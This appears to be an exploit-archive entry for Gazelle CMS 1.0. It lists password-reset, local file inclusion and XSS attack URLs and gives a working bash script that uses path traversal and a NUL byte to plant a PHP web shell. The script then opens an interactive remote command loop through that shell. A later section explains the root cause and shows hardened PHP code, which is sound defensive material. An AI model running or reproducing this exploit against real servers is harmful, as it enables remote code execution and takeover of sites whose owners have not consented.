Gazelle CMS 1.0 Multiple Vulnerabilities / RCE Exploit

2009-09-15 / 2009-09-16
Credit: mr_me
Risk: High
Local: No
Remote: Yes

#!/bin/bash
# Gazelle CMS 1.0 Multiple Vulnerabilities
# Script Download: http://www.anantasoft.com/index.php?Gazelle%20CMS/Download
# Found by white_sheep on 11/08/2009
# Contact: sheewhite@googlemail.com - https://www.ihteam.net
# Need magic_quote_gpc Off for RCE and LFI
# Thanks to R00T[ATI]
#
# PASSWORD RESET:
# http://localhost/gazelle/renew.php?user=[username]
#
# LFI:
# http://localhost/gazelle/index.php?template=[LFI]
#
# XSS:
# http://localhost/gazelle/user.php?user=</title>[XSS]
# http://localhost/gazelle/search.php?lookup=<script+type="text/javascript">[CODE]</script>
#
# RCE:

echo
echo "###############################################"
echo "#            GazelleCMS 1.0 RCE               #"
echo "#              by white_sheep                 #"
echo "#      sheewhite[at]googlemail[dot]com        #"
echo "#                                             #"
echo "#          https://www.ihteam.net             #"
echo "###############################################"
echo

# PHP payload written into the dropped file; the 'INIT' and 'EOF' markers that
# surround it in the POST body later delimit the command output in the response
EVILC='<?php passthru($_GET[cmd]); ?>'

echo -n "Insert url with path (ex.: http://localhost/gazelle): "
read SITE

# Randomised .php target under /modules, reached by traversing out of the
# directory settemplate.php normally writes to
PAGENAME=/modules/menu$RANDOM'.bak.php'

# settemplate.php writes the posted siteTitle into the path named by
# customizetemplate: '..' escapes the directory and the trailing %00 (a NUL
# byte once magic_quotes_gpc is off) truncates whatever suffix the script appends
curl -F "siteTitle='INIT'$EVILC'EOF';type=text/html" $SITE'/admin/settemplate.php?customizetemplate=..'$PAGENAME'%00' 1>/dev/null 2>/dev/null

# Request the dropped file; if the write succeeded the response carries the
# literal string siteTitle, otherwise bail out
if [ "`curl -s $SITE''$PAGENAME | grep siteTitle`" == "" ]
then
    echo "[-] Not Vulnerable :( byee"
    exit
fi

# Interactive loop: spaces become '+' for the query string, the command runs
# through passthru() via ?cmd=, and sed cuts the output out from between the markers
while true
do
    echo -n "sh$: "
    read -r CMD
    CMD=`echo $CMD | sed 's/ /+/g'`
    echo $CMD
    curl -s "$SITE$PAGENAME?cmd=$CMD" | sed "s/.*'INIT'//g;s/'EOF'.*//g"
    echo
done
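The RCE and the LFI above share one root cause: a file path built from a request parameter, with a NUL byte (%00) cutting off whatever suffix the script appends, plus, for the RCE, a user-supplied value written verbatim into a file the web server will execute. The PHP below is an added illustration of that pattern beside a hardened form; it is not Gazelle's source, and the function names, the `templates/` directory and the key=value file layout are assumptions. Two caveats a practitioner should know: NUL bytes in filesystem paths are rejected by PHP since 5.3.4 (newer versions raise a `ValueError`), and `magic_quotes_gpc`, whose "off" state the exploit header requires, was removed in PHP 5.4, so the truncation step only works on the old interpreters the 2009 advisory targeted. The traversal and the executable-content problems, however, do not depend on PHP version.

```php
<?php
// Added illustration (not Gazelle's code): the path/content write pattern the
// exploit relies on, and a hardened version. Names and layout are assumptions.
declare(strict_types=1);

// --- Vulnerable pattern (hypothetical reconstruction) -----------------------
function settemplate_vulnerable(string $customizetemplate, string $siteTitle): string
{
    // Path is attacker-controlled: "../modules/menu1234.bak.php\0" escapes the
    // templates directory and, on PHP < 5.3.4 with magic_quotes_gpc off, the
    // NUL byte truncates the suffix appended here. Modern PHP refuses the NUL.
    $file = __DIR__ . '/templates/' . $customizetemplate . '.tpl';

    // Content is attacker-controlled and written verbatim. Once the target
    // ends in .php, "<?php passthru($_GET[cmd]); ?>" inside siteTitle executes
    // on every request, which is what the exploit's sed filter extracts.
    $content = 'siteTitle=' . $siteTitle . "\n";
    file_put_contents($file, $content);
    return $file;
}

// --- Hardened pattern --------------------------------------------------------
const TEMPLATE_DIR = __DIR__ . '/templates';   // assumed layout

function template_path(string $name, string $ext): string
{
    // Allowlist the name itself: no slashes, no dots, no NUL, bounded length.
    // The same check serves settemplate.php's write and index.php?template='s include.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $name)) {
        throw new InvalidArgumentException('invalid template name');
    }
    $dir = realpath(TEMPLATE_DIR);
    if ($dir === false) {
        throw new RuntimeException('templates directory missing');
    }
    $path = $dir . DIRECTORY_SEPARATOR . $name . $ext;
    // Defence in depth: the resolved parent must still be the templates directory.
    if (realpath(dirname($path)) !== $dir) {
        throw new RuntimeException('path escapes templates directory');
    }
    return $path;
}

function settemplate_hardened(string $customizetemplate, string $siteTitle): string
{
    $file = template_path($customizetemplate, '.json');
    // Store settings as data in a non-executable format: a "<?php" inside
    // siteTitle is now just a string, whatever extension the file ends up with.
    $content = json_encode(['siteTitle' => $siteTitle], JSON_THROW_ON_ERROR);
    if (file_put_contents($file, $content, LOCK_EX) === false) {
        throw new RuntimeException('write failed');
    }
    return $file;
}

function load_template_hardened(string $template): string
{
    // Include side of the same bug (the LFI): never include a path built from
    // raw input; resolve it through the allowlist first.
    return template_path($template, '.php');
}

function render_title(string $siteTitle): string
{
    // Where the stored value is echoed back, escape it; the advisory's XSS
    // vectors (user.php?user=, search.php?lookup=) are the reflected form of this.
    return htmlspecialchars($siteTitle, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Usage: the traversal-plus-NUL name the exploit sends is rejected up front.
$evil = "../modules/menu1234.bak.php\0";
try {
    template_path($evil, '.json');
} catch (InvalidArgumentException $e) {
    echo "rejected: {$e->getMessage()}\n";
}
echo render_title("'INIT'<?php passthru(\$_GET[cmd]); ?>'EOF'"), "\n";
```

The allowlist regex does the real work; `realpath()` is kept only as a second line of defence, and the switch to a JSON file means that even a future bug in the path check cannot turn a settings write into code execution.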

References:

http://www.milw0rm.com/exploits/9425
http://secunia.com/advisories/33686

